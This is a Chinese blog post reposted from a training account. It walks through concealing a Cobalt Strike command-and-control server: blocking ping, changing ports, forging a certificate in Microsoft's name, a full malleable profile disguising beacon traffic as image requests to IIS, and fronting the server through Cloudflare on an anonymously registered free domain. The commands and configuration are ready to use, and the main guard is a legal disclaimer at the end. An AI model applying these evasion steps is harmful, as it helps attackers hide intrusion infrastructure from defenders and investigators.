内网神器Cobalt Strike隐藏特征与流量混淆.

admin 2023年5月23日17:42:20评论70 views字数 4330阅读14分26秒阅读模式
                     

学网安渗透

扫码加我吧

免费&进群

内网神器Cobalt Strike隐藏特征与流量混淆.  
内网神器Cobalt Strike隐藏特征与流量混淆.

Track安全社区投稿~  

千元稿费!还有保底奖励~

由于上次还没有写好https上线的东西,今天加班加点的弄出来了。
本文内容如有错误,望及时告知,以免误导他人.

Cobalt Strike 特征隐藏与流量混淆

大致内容:

  • 修改默认端口

  • 服务器设置禁Ping

  • Cobalt Strike默认证书修改

  • CDN隐藏

  • 利用C2流量混淆

Cobalt Strike服务端配置

0x01. 需求配置

  • vps一台

  • 域名

  • CDN

  • Cobalt Strike4.0

0x02. 服务器设置禁ping

服务器禁ping从某种意义上来说,算是不存活的主机,但nmap是依然能够扫描出来的。
设置禁ping命令:
vim /etc/sysctl.conf 打开后按i进入编辑模式,在任意位置新增以下内容
net.ipv4.icmp_echo_ignore_all=1

内网神器Cobalt Strike隐藏特征与流量混淆.

新增之后 ESC -> 冒号 -> wq[退出并保存]
再使用命令 sysctl -p 即可生效,这时候再ping主机就会ping不通了。

内网神器Cobalt Strike隐藏特征与流量混淆.

0x03. 修改Cobalt Strike默认端口号

在服务端的teamserver文件末尾处修改

内网神器Cobalt Strike隐藏特征与流量混淆.

修改之后再次启动teamserver的时候即可看到端口已经更改。

内网神器Cobalt Strike隐藏特征与流量混淆.

0x04. 修改默认证书

Cobalt Strike默认证书中含有与cs相关的特征,所以需要替换掉cs原有的证书,重新生成一个无特征的证书文件。
前提条件:服务器上已安装java
使用jdk自带的keytools这个java证书管理工具来生成新的无特征证书。

  • 首先删除cobalt strike原有的证书

  • 新建一个其他名字,只需要在teamserver最后一行修改 -Djavax.net.ssl.keyStore=./new.store 即可

  • 在Cobalt Strike当前目录生成一个无特征的证书

keytool -keystore 生成的store名 -storepass 密码 -keypass 密码 -genkey -keyalg RSA -alias 自定义别名 -dname "CN=Microsoft Windows, OU=MOPR, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US"

keytool -keystore new.store -storepass bypass -keypass bypass -genkey -keyalg RSA -alias apex.tk -dname "CN=Microsoft Windows, OU=MOPR, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US"

内网神器Cobalt Strike隐藏特征与流量混淆.

  • 修改证书标准并应用

> keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12

至此证书修改完成,使用命令:
keytool -list -v -keystore cobaltstrike.store 可查看证书内容

内网神器Cobalt Strike隐藏特征与流量混淆.

可以看到签名是92EE36结尾,启动teamserver看看证书签名是否一致:

内网神器Cobalt Strike隐藏特征与流量混淆.

签名一致,确认证书修改成功.

0x05.混淆流量

接下来修改Beacon与cobalt strike通信时候的流量特征,创建一个.profile文件(名字任意),贴入以下从大佬那里偷过来的代码。

https-certificate {
set keystore "new.store"; #证书名字
set password "bypass"; #证书密码
}
#以上没有配置cloudflare的时候可以先不写

http-get {
set uri "/image/";
client {
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8";
header "Referer" "http://www.google.com";
header "Host" "apex1.tk"; #域名,还没有配置cloudflare的时候这一行注释掉
header "Pragma" "no-cache";
header "Cache-Control" "no-cache";
metadata {
netbios;
append ".jpg"; # 传输内容自动追加的后缀
uri-append;
}
}
server {
header "Content-Type" "img/jpg";
header "Server" "Microsoft-IIS/6.0";
header "X-Powered-By" "ASP.NET";
output {
base64; # 加密方式(base64、base64url、netbios、netbiosu)
print;
}
}
}
http-post {
set uri "/email/";
client {
header "Content-Type" "application/octet-stream";
header "Referer" "http://www.google.com";
header "Host" "apex1.tk"; #域名,还没有配置cloudflare的时候这一行注释掉
header "Pragma" "no-cache";
header "Cache-Control" "no-cache";
id {
netbiosu;
append ".png";
uri-append;
}
output {
base64;
print;
}
}
server {
header "Content-Type" "img/jpg";
header "Server" "Microsoft-IIS/6.0";
header "X-Powered-By" "ASP.NET";
output {
base64;
print;
}
}
}

保存之后赋予服务端的c2lint执行权限:chmod 777 c2lint

然后输入:./c2lint img.profile

输出如下图所示即为配置成功

内网神器Cobalt Strike隐藏特征与流量混淆.

内网神器Cobalt Strike隐藏特征与流量混淆.

使用CDN隐藏

0x01. 申请免费域名(白嫖是真香啊.)

白嫖域名连接:www.freenom.com 可以用来做博客域名、也可用来做其他用处
白嫖的可以不留过多信息,使用谷歌账号登录即可.
记得科学上网挂着,不然有可能申请不通过。

内网神器Cobalt Strike隐藏特征与流量混淆.

域名自己随便写一个喜欢的即可,检查可用性,然后点击selected,Checkout即可,1-12个月都是免费的

内网神器Cobalt Strike隐藏特征与流量混淆.

内网神器Cobalt Strike隐藏特征与流量混淆.

0x02. CDN配置(白嫖系列)

一时白嫖一时爽,一直白嫖一直爽,使用Cloudflare白嫖cdn.
有账号可以继续使用该账号进行添加站点,没有账号使用匿名邮箱注册一个即可.(推荐outlook、protonmail都可匿名)

1. 添加站点记录

内网神器Cobalt Strike隐藏特征与流量混淆.

这里添加站点,有时候会报错,google、baidu了很多方法都不管用,于是乎第二天就可以添加到了。

内网神器Cobalt Strike隐藏特征与流量混淆.

2. 添加DNS记录

根据自己喜欢随便整就行,解析记得写vps的地址,代理状态是默认开启,没有的话手动开启一下即可.

内网神器Cobalt Strike隐藏特征与流量混淆.

3. 修改DNS服务器

去freenom中删除dns名称服务器,添加为cloudflare的名称服务器

内网神器Cobalt Strike隐藏特征与流量混淆.

到freenom中修改dns服务器

内网神器Cobalt Strike隐藏特征与流量混淆.

内网神器Cobalt Strike隐藏特征与流量混淆.

内网神器Cobalt Strike隐藏特征与流量混淆.

4. 配置完成

以上操作完成之后回到cloudflare进行下一步
将https重写、始终使用https、Brotli都关闭并保存,之后点击检查名称服务器
点击检查之后过一会儿刷新一下页面,出现以下就代表成功了

内网神器Cobalt Strike隐藏特征与流量混淆.

内网神器Cobalt Strike隐藏特征与流量混淆.

一定要开启开发者模式!!!
缓存 -> 开发模式 开启

内网神器Cobalt Strike隐藏特征与流量混淆.

Cloudflare CDN支持的http端口:80,8080,8880,2052,2082,2086,2098
Cloudflare CDN支持的https端口:443,2053,2083,2087,2096,8443

5.HTTPS证书配置

首先配置配置SSL/TLS加密模式为完全,点击 源服务器 -> 创建证书,把密钥和证书复制保存下来,分别保存为pem.pem和key.key,然后上传到cobalt strike服务端

内网神器Cobalt Strike隐藏特征与流量混淆.

内网神器Cobalt Strike隐藏特征与流量混淆.

内网神器Cobalt Strike隐藏特征与流量混淆.

内网神器Cobalt Strike隐藏特征与流量混淆.

上传到服务端之后,使用keytool重新创建store证书:

首先执行openssl pkcs12 -export -in 证书名 -inkey 私钥名 -out p12名,如abc.p12 -name 域名 -passout pass:bypass

openssl pkcs12 -export -in pem.pem -inkey key.key -out apex.tk.p12 -name apex.tk -passout pass:bypass

其次执行keytool -importkeystore -deststorepass 密码 -destkeypass 密码 -destkeystore store名 -srckeystore p12名,如abc.p12 -srcstoretype PKCS12 -srcstor epass 密码 -alias 别名

keytool -importkeystore -deststorepass bypass -destkeypass bypass -destkeystore new.store -srckeystore apex.tk.p12 -srcstoretype PKCS12 -srcstor epass bypass -alias apex.tk

最后在profile配置文件中,取消注释头部的代码即可。

启动服务端的时候命令:./teamserver xx.xx.xx.xx password img.profile

6.测试上线

Listener按照下图配置,HTTPS同理

内网神器Cobalt Strike隐藏特征与流量混淆.

这里local port http就写80 https就写443
内网神器Cobalt Strike隐藏特征与流量混淆.

内网神器Cobalt Strike隐藏特征与流量混淆.

参考文档:
https://www.jianshu.com/p/e7701efef047
https://www.cnblogs.com/Xy--1/p/14396744.html
https://lengjibo.github.io/malleable/


申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

内网神器Cobalt Strike隐藏特征与流量混淆.

没看够~?欢迎关注!


分享本文到朋友圈,可以凭截图找老师领取

上千教程+工具+交流群+靶场账号

 

内网神器Cobalt Strike隐藏特征与流量混淆.

 分享后扫码加我



回顾往期内容


Xray挂机刷漏洞

零基础学黑客,该怎么学?

网络安全人员必考的几本证书!

文库|内网神器cs4.0使用说明书

代码审计 | 这个CNVD证书拿的有点轻松

【精选】SRC快速入门+上分小秘籍+实战指南

    代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!

内网神器Cobalt Strike隐藏特征与流量混淆.

点赞+在看支持一下吧~感谢看官老爷~ 

你的点赞是我更新的动力


原文始发于微信公众号(掌控安全EDU):内网神器Cobalt Strike隐藏特征与流量混淆.

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月23日17:42:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网神器Cobalt Strike隐藏特征与流量混淆.https://cn-sec.com/archives/1753800.html

发表评论

匿名网友 填写信息